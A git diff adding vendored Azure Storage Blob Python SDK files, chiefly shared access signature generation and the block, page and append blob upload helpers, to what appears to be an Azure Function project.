signatures. + :param str account_key: + The access key to generate the shared access signatures. + :param ~azure.storage.blob.models.UserDelegationKey user_delegation_key: + Instead of an account key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling get_user_delegation_key on any Blob service object.
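+
+        A minimal construction sketch (the account name and key are
+        placeholders)::
+
+            sas = BlobSharedAccessSignature('myaccount', account_key='account-key')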
+ ''' + super(BlobSharedAccessSignature, self).__init__(account_name, account_key, x_ms_version=X_MS_VERSION) + self.user_delegation_key = user_delegation_key + + def generate_blob(self, container_name, blob_name, snapshot=None, version_id=None, permission=None, + expiry=None, start=None, policy_id=None, ip=None, protocol=None, + cache_control=None, content_disposition=None, + content_encoding=None, content_language=None, + content_type=None, **kwargs): + ''' + Generates a shared access signature for the blob or one of its snapshots. + Use the returned signature with the sas_token parameter of any BlobService. + + :param str container_name: + Name of container. + :param str blob_name: + Name of blob. + :param str snapshot: + The snapshot parameter is an opaque DateTime value that, + when present, specifies the blob snapshot to grant permission. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxytmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or BlobSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + set_blob_service_properties. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :param str protocol: + Specifies the protocol permitted for a request made. The default value + is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values. + :param str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :param str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :param str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :param str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :param str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. 
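+
+        Illustrative call on an existing ``BlobSharedAccessSignature``
+        instance ``sas`` (assumes ``datetime`` and ``timedelta`` are
+        imported; all values are placeholders)::
+
+            token = sas.generate_blob(
+                'mycontainer', 'myblob.txt',
+                permission='r',
+                expiry=datetime.utcnow() + timedelta(hours=1))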
+ ''' + resource_path = container_name + '/' + blob_name + + sas = _BlobSharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_id(policy_id) + + resource = 'bs' if snapshot else 'b' + resource = 'bv' if version_id else resource + resource = 'd' if kwargs.pop("is_directory", None) else resource + sas.add_resource(resource) + + sas.add_timestamp(snapshot or version_id) + sas.add_override_response_headers(cache_control, content_disposition, + content_encoding, content_language, + content_type) + sas.add_encryption_scope(**kwargs) + sas.add_info_for_hns_account(**kwargs) + sas.add_resource_signature(self.account_name, self.account_key, resource_path, + user_delegation_key=self.user_delegation_key) + + return sas.get_token() + + def generate_container(self, container_name, permission=None, expiry=None, + start=None, policy_id=None, ip=None, protocol=None, + cache_control=None, content_disposition=None, + content_encoding=None, content_language=None, + content_type=None, **kwargs): + ''' + Generates a shared access signature for the container. + Use the returned signature with the sas_token parameter of any BlobService. + + :param str container_name: + Name of container. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxyltfmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + set_blob_service_properties. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :param str protocol: + Specifies the protocol permitted for a request made. The default value + is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values. + :param str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :param str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. 
+ :param str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :param str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :param str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + ''' + sas = _BlobSharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_id(policy_id) + sas.add_resource('c') + sas.add_override_response_headers(cache_control, content_disposition, + content_encoding, content_language, + content_type) + sas.add_encryption_scope(**kwargs) + sas.add_info_for_hns_account(**kwargs) + sas.add_resource_signature(self.account_name, self.account_key, container_name, + user_delegation_key=self.user_delegation_key) + return sas.get_token() + + +class _BlobSharedAccessHelper(_SharedAccessHelper): + + def add_timestamp(self, timestamp): + self._add_query(BlobQueryStringConstants.SIGNED_TIMESTAMP, timestamp) + + def add_info_for_hns_account(self, **kwargs): + self._add_query(QueryStringConstants.SIGNED_DIRECTORY_DEPTH, kwargs.pop('sdd', None)) + self._add_query(QueryStringConstants.SIGNED_AUTHORIZED_OID, kwargs.pop('preauthorized_agent_object_id', None)) + self._add_query(QueryStringConstants.SIGNED_UNAUTHORIZED_OID, kwargs.pop('agent_object_id', None)) + self._add_query(QueryStringConstants.SIGNED_CORRELATION_ID, kwargs.pop('correlation_id', None)) + + def get_value_to_append(self, query): + return_value = self.query_dict.get(query) or '' + return return_value + '\n' + + def add_resource_signature(self, account_name, account_key, path, user_delegation_key=None): + # pylint: disable = no-member + if path[0] != '/': + path = '/' + path + + canonicalized_resource = '/blob/' + account_name + path + '\n' + + # Form the string to sign from shared_access_policy and canonicalized + # resource. The order of values is important. 
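+        # The service recomputes this exact newline-delimited string when
+        # validating the token, so field order and blank fields both matter.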
+ string_to_sign = \ + (self.get_value_to_append(QueryStringConstants.SIGNED_PERMISSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_START) + + self.get_value_to_append(QueryStringConstants.SIGNED_EXPIRY) + + canonicalized_resource) + + if user_delegation_key is not None: + self._add_query(QueryStringConstants.SIGNED_OID, user_delegation_key.signed_oid) + self._add_query(QueryStringConstants.SIGNED_TID, user_delegation_key.signed_tid) + self._add_query(QueryStringConstants.SIGNED_KEY_START, user_delegation_key.signed_start) + self._add_query(QueryStringConstants.SIGNED_KEY_EXPIRY, user_delegation_key.signed_expiry) + self._add_query(QueryStringConstants.SIGNED_KEY_SERVICE, user_delegation_key.signed_service) + self._add_query(QueryStringConstants.SIGNED_KEY_VERSION, user_delegation_key.signed_version) + + string_to_sign += \ + (self.get_value_to_append(QueryStringConstants.SIGNED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_TID) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_START) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_EXPIRY) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_SERVICE) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_VERSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_AUTHORIZED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_UNAUTHORIZED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_CORRELATION_ID)) + else: + string_to_sign += self.get_value_to_append(QueryStringConstants.SIGNED_IDENTIFIER) + + string_to_sign += \ + (self.get_value_to_append(QueryStringConstants.SIGNED_IP) + + self.get_value_to_append(QueryStringConstants.SIGNED_PROTOCOL) + + self.get_value_to_append(QueryStringConstants.SIGNED_VERSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_RESOURCE) + + self.get_value_to_append(BlobQueryStringConstants.SIGNED_TIMESTAMP) + + self.get_value_to_append(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE) + + self.get_value_to_append(QueryStringConstants.SIGNED_CACHE_CONTROL) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_DISPOSITION) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_ENCODING) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_LANGUAGE) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_TYPE)) + + # remove the trailing newline + if string_to_sign[-1] == '\n': + string_to_sign = string_to_sign[:-1] + + self._add_query(QueryStringConstants.SIGNED_SIGNATURE, + sign_string(account_key if user_delegation_key is None else user_delegation_key.value, + string_to_sign)) + + def get_token(self): + # a conscious decision was made to exclude the timestamp in the generated token + # this is to avoid having two snapshot ids in the query parameters when the user appends the snapshot timestamp + exclude = [BlobQueryStringConstants.SIGNED_TIMESTAMP] + return '&'.join(['{0}={1}'.format(n, url_quote(v)) + for n, v in self.query_dict.items() if v is not None and n not in exclude]) + + +def generate_account_sas( + account_name, # type: str + account_key, # type: str + resource_types, # type: Union[ResourceTypes, str] + permission, # type: Union[AccountSasPermissions, str] + expiry, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): # type: (...) -> str + """Generates a shared access signature for the blob service. 
+ + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + :param resource_types: + Specifies the resource types that are accessible with the account SAS. + :type resource_types: str or ~azure.storage.blob.ResourceTypes + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.AccountSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token. + :rtype: str + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_sas_token] + :end-before: [END create_sas_token] + :language: python + :dedent: 8 + :caption: Generating a shared access signature. + """ + sas = SharedAccessSignature(account_name, account_key) + return sas.generate_account( + services=Services(blob=True), + resource_types=resource_types, + permission=permission, + expiry=expiry, + start=start, + ip=ip, + **kwargs + ) # type: ignore + + +def generate_container_sas( + account_name, # type: str + container_name, # type: str + account_key=None, # type: Optional[str] + user_delegation_key=None, # type: Optional[UserDelegationKey] + permission=None, # type: Optional[Union[ContainerSasPermissions, str]] + expiry=None, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + policy_id=None, # type: Optional[str] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Any + """Generates a shared access signature for a container. 
+ + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str container_name: + The name of the container. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + Either `account_key` or `user_delegation_key` must be specified. + :param ~azure.storage.blob.UserDelegationKey user_delegation_key: + Instead of an account shared key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`. + When present, the SAS is signed with the user delegation key instead. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxyltfmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :keyword str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :keyword str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :keyword str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. 
+ :keyword str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token. + :rtype: str + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START generate_sas_token] + :end-before: [END generate_sas_token] + :language: python + :dedent: 12 + :caption: Generating a sas token. + """ + if not user_delegation_key and not account_key: + raise ValueError("Either user_delegation_key or account_key must be provided.") + if isinstance(account_key, UserDelegationKey): + user_delegation_key = account_key + if user_delegation_key: + sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key) + else: + sas = BlobSharedAccessSignature(account_name, account_key=account_key) + return sas.generate_container( + container_name, + permission=permission, + expiry=expiry, + start=start, + policy_id=policy_id, + ip=ip, + **kwargs + ) + + +def generate_blob_sas( + account_name, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[str] + account_key=None, # type: Optional[str] + user_delegation_key=None, # type: Optional[UserDelegationKey] + permission=None, # type: Optional[Union[BlobSasPermissions, str]] + expiry=None, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + policy_id=None, # type: Optional[str] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Any + """Generates a shared access signature for a blob. + + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str container_name: + The name of the container. + :param str blob_name: + The name of the blob. + :param str snapshot: + An optional blob snapshot ID. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + Either `account_key` or `user_delegation_key` must be specified. + :param ~azure.storage.blob.UserDelegationKey user_delegation_key: + Instead of an account shared key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`. + When present, the SAS is signed with the user delegation key instead. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxytmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.BlobSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. 
If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str version_id: + An optional blob version ID. This parameter is only applicable to versioning-enabled accounts. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :keyword str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :keyword str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :keyword str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :keyword str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token.
+ :rtype: str + """ + if not user_delegation_key and not account_key: + raise ValueError("Either user_delegation_key or account_key must be provided.") + if isinstance(account_key, UserDelegationKey): + user_delegation_key = account_key + version_id = kwargs.pop('version_id', None) + if version_id and snapshot: + raise ValueError("snapshot and version_id cannot be set at the same time.") + if user_delegation_key: + sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key) + else: + sas = BlobSharedAccessSignature(account_name, account_key=account_key) + return sas.generate_blob( + container_name, + blob_name, + snapshot=snapshot, + version_id=version_id, + permission=permission, + expiry=expiry, + start=start, + policy_id=policy_id, + ip=ip, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py new file mode 100644 index 0000000..08c1a1b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py @@ -0,0 +1,320 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from io import SEEK_SET, UnsupportedOperation +from typing import Optional, Union, Any, TypeVar, TYPE_CHECKING # pylint: disable=unused-import + +import six +from azure.core.exceptions import ResourceExistsError, ResourceModifiedError, HttpResponseError + +from ._shared.response_handlers import ( + process_storage_error, + return_response_headers) +from ._shared.models import StorageErrorCode +from ._shared.uploads import ( + upload_data_chunks, + upload_substream_blocks, + BlockBlobChunkUploader, + PageBlobChunkUploader, + AppendBlobChunkUploader) +from ._shared.encryption import generate_blob_encryption_data, encrypt_blob +from ._generated.models import ( + BlockLookupList, + AppendPositionAccessConditions, + ModifiedAccessConditions, +) + +if TYPE_CHECKING: + from datetime import datetime # pylint: disable=unused-import + BlobLeaseClient = TypeVar("BlobLeaseClient") + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = '{0} should be a seekable file-like/io.IOBase type stream object.' 
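
Before the upload helpers below, a minimal usage sketch of the two SAS generators defined above; the account name, key, container, and blob names are illustrative placeholders, not values from this repository:

```python
# Hedged sketch: placeholder account/container/blob names and key.
from datetime import datetime, timedelta, timezone

from azure.storage.blob import BlobClient, BlobSasPermissions, generate_blob_sas

account_name = "mystorageaccount"   # placeholder
account_key = "<account-key>"       # placeholder

# Sign a read-only token for a single blob, valid for one hour.
sas_token = generate_blob_sas(
    account_name=account_name,
    container_name="mycontainer",
    blob_name="myblob.txt",
    account_key=account_key,
    permission=BlobSasPermissions(read=True),
    expiry=datetime.now(timezone.utc) + timedelta(hours=1),
)

# Per the docstrings above, the token is passed as the client credential.
client = BlobClient(
    account_url=f"https://{account_name}.blob.core.windows.net",
    container_name="mycontainer",
    blob_name="myblob.txt",
    credential=sas_token,
)
```

generate_container_sas follows the same call shape, minus blob_name and with ContainerSasPermissions in place of BlobSasPermissions.
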
+ + +def _convert_mod_error(error): + message = error.message.replace( + "The condition specified using HTTP conditional header(s) is not met.", + "The specified blob already exists.") + message = message.replace("ConditionNotMet", "BlobAlreadyExists") + overwrite_error = ResourceExistsError( + message=message, + response=error.response, + error=error) + overwrite_error.error_code = StorageErrorCode.blob_already_exists + raise overwrite_error + + +def _any_conditions(modified_access_conditions=None, **kwargs): # pylint: disable=unused-argument + return any([ + modified_access_conditions.if_modified_since, + modified_access_conditions.if_unmodified_since, + modified_access_conditions.if_none_match, + modified_access_conditions.if_match + ]) + + +def upload_block_blob( # pylint: disable=too-many-locals + client=None, + data=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + adjusted_count = length + if (encryption_options.get('key') is not None) and (adjusted_count is not None): + adjusted_count += (16 - (length % 16)) + blob_headers = kwargs.pop('blob_headers', None) + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + + immutability_policy = kwargs.pop('immutability_policy', None) + immutability_policy_expiry = None if immutability_policy is None else immutability_policy.expiry_time + immutability_policy_mode = None if immutability_policy is None else immutability_policy.policy_mode + legal_hold = kwargs.pop('legal_hold', None) + progress_hook = kwargs.pop('progress_hook', None) + + # Do single put if the size is smaller than or equal config.max_single_put_size + if adjusted_count is not None and (adjusted_count <= blob_settings.max_single_put_size): + try: + data = data.read(length) + if not isinstance(data, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + except AttributeError: + pass + if encryption_options.get('key'): + encryption_data, data = encrypt_blob(data, encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + + response = client.upload( + body=data, + content_length=adjusted_count, + blob_http_headers=blob_headers, + headers=headers, + cls=return_response_headers, + validate_content=validate_content, + data_stream_total=adjusted_count, + upload_stream_current=0, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + + if progress_hook: + progress_hook(adjusted_count, adjusted_count) + + return response + + use_original_upload_path = blob_settings.use_byte_buffer or \ + validate_content or encryption_options.get('required') or \ + blob_settings.max_block_size < blob_settings.min_large_block_upload_threshold or \ + hasattr(stream, 'seekable') and not stream.seekable() or \ + not hasattr(stream, 'seek') or not hasattr(stream, 'tell') + + if use_original_upload_path: + if encryption_options.get('key'): + cek, iv, encryption_data = generate_blob_encryption_data(encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + encryption_options['cek'] = cek + encryption_options['vector'] = iv + block_ids = upload_data_chunks( + service=client, 
+ uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + else: + block_ids = upload_substream_blocks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + block_lookup.latest = block_ids + return client.commit_block_list( + block_lookup, + blob_http_headers=blob_headers, + cls=return_response_headers, + validate_content=validate_content, + headers=headers, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +def upload_page_blob( + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + if length is None or length < 0: + raise ValueError("A content length must be specified for a Page Blob.") + if length % 512 != 0: + raise ValueError("Invalid page blob size: {0}. 
" + "The size must be aligned to a 512-byte boundary.".format(length)) + if kwargs.get('premium_page_blob_tier'): + premium_page_blob_tier = kwargs.pop('premium_page_blob_tier') + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier + if encryption_options and encryption_options.get('data'): + headers['x-ms-meta-encryptiondata'] = encryption_options['data'] + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + response = client.create( + content_length=0, + blob_content_length=length, + blob_sequence_number=None, + blob_http_headers=kwargs.pop('blob_headers', None), + blob_tags_string=blob_tags_string, + cls=return_response_headers, + headers=headers, + **kwargs) + if length == 0: + return response + + kwargs['modified_access_conditions'] = ModifiedAccessConditions(if_match=response['etag']) + return upload_data_chunks( + service=client, + uploader_class=PageBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_page_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs) + + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +def upload_append_blob( # pylint: disable=unused-argument + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if length == 0: + return {} + blob_headers = kwargs.pop('blob_headers', None) + append_conditions = AppendPositionAccessConditions( + max_size=kwargs.pop('maxsize_condition', None), + append_position=None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + try: + if overwrite: + client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + if error.response.status_code != 404: + raise + # rewind the request body if it is a stream + if hasattr(stream, 'read'): + try: + # attempt to rewind the body to the initial position + stream.seek(0, SEEK_SET) + except UnsupportedOperation: + # if body is not seekable, then retry would not work + raise error + client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py new file mode 100644 index 0000000..c4ae600 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py @@ -0,0 +1,7 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +VERSION = "12.12.0" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py new file mode 100644 index 0000000..ba5b381 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py @@ -0,0 +1,143 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import os + +from ._list_blobs_helper import BlobPrefix +from .._models import BlobType +from .._shared.policies_async import ExponentialRetry, LinearRetry +from ._blob_client_async import BlobClient 